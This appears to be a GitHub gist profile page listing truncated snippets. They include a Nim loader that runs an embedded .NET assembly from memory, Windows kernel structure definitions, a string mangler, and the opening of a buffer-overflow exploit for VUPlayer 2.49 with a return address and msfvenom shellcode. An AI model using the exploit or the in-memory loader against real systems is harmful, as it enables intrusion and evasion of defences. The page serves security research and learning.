Skip to content

Instantly share code, notes, and snippets.

Avatar
👨‍💻
Learning..

Mr. Rc HACKE-RC

👨‍💻
Learning..
View GitHub Profile
@HACKE-RC
HACKE-RC / app.cs
Last active Oct 17, 2022
C# code of the .NET assembly used in loader.nim
View app.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace CLRHello1
{
class Program
{
@HACKE-RC
HACKE-RC / loader.nim
Created Oct 17, 2022
Nim loader that can load a .NET assembly from memory.
View loader.nim
import winim/clr
# buffer contains the dll
var buf: array[3584, byte] = [
byte 0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
0xFF, 0xFF, 0x00, 0x00, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x80, 0x00, 0x00, 0x00, 0x0E, 0x1F, 0xBA, 0x0E, 0x00, 0xB4, 0x09, 0xCD,
@HACKE-RC
HACKE-RC / KTHREAD.c
Created May 31, 2022
The Windows KTHREAD structure.
View KTHREAD.c
struct _KTHREAD {
struct _DISPATCHER_HEADER Header;
void *SListFaultAddress;
unsigned int QuantumTarget;
void *InitialStack;
void *StackLimit;
void *StackBase;
unsigned int ThreadLock;
unsigned int CycleTime;
unsigned long CurrentRunTime;
@HACKE-RC
HACKE-RC / ETHREAD.c
Created May 31, 2022
The Windows ETHREAD structure.
View ETHREAD.c
struct _ETHREAD {
struct _KTHREAD Tcb;
union _LARGE_INTEGER CreateTime;
union _LARGE_INTEGER ExitTime;
struct _LIST_ENTRY KeyedWaitChain;
void *ChargeOnlySession;
struct _LIST_ENTRY PostBlockList;
void *ForwardLinkShadow;
void *StartAddress;
struct _TERMINATION_PORT *TerminationPort;
@HACKE-RC
HACKE-RC / TEB.c
Created May 31, 2022
The Windows ETHREAD data structure.
View TEB.c
struct _TEB {
struct _NT_TIB NtTib;
void *EnvironmentPointer;
struct _CLIENT_ID ClientId;
void *ActiveRpcHandle;
void *ThreadLocalStoragePointer;
struct _PEB *ProcessEnvironmentBlock;
unsigned long LastErrorValue;
unsigned long CountOfOwnedCriticalSections;
void *CsrClientThread;
@HACKE-RC
HACKE-RC / KPROCESS.c
Created May 31, 2022
The Windows KPROCESS structure.
View KPROCESS.c
struct _KPROCESS {
struct _DISPATCHER_HEADER Header;
struct _LIST_ENTRY ProfileListHead;
unsigned int DirectoryTableBase;
unsigned long Asid;
struct _LIST_ENTRY ThreadListHead;
unsigned long ProcessLock;
unsigned long Spare0;
unsigned int DeepFreezeStartTime;
struct _KAFFINITY_EX Affinity;
@HACKE-RC
HACKE-RC / EPROCESS.c
Created May 31, 2022
The Windows EPROCESS data structure.
View EPROCESS.c
typedef struct _EPROCESS {
struct _KPROCESS Pcb;
struct _EX_PUSH_LOCK ProcessLock;
PVOID UniqueProcessId;
struct _LIST_ENTRY ActiveProcessLinks;
struct _EX_RUNDOWN_REF RundownProtect;
ULONG Flags2;
ULONG JobNotReallyActive: 1;
ULONG AccountingFolded: 1;
ULONG NewProcessReported: 1;
@HACKE-RC
HACKE-RC / exploit.py
Created Aug 17, 2021
VUPlayer 2.49 (Windows 7) - '.m3u' Local Buffer Overflow.
View exploit.py
from struct import pack
offest = 1012
eip = pack("<I", 0x10022F07)
nops = "\x90"*16
size = 1100
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0a\x1a" -f py Encoder=PexAlphaNum
buf = b""
buf += b"\xda\xdb\xd9\x74\x24\xf4\xba\x2c\x59\xcf\x98\x58\x2b"
@HACKE-RC
HACKE-RC / mangler.py
Created Apr 30, 2021
give '123456789' to any program which plays with it, then get the output and specify it as the first output of the command and then specify your input that you want to mangle in the same way as the second argument
View mangler.py
#!/bin/env python3
from sys import argv
work = True if len(argv)>2 else False
if not work:
exit()
pattern = '123456789'
mangled = argv[1]
res = []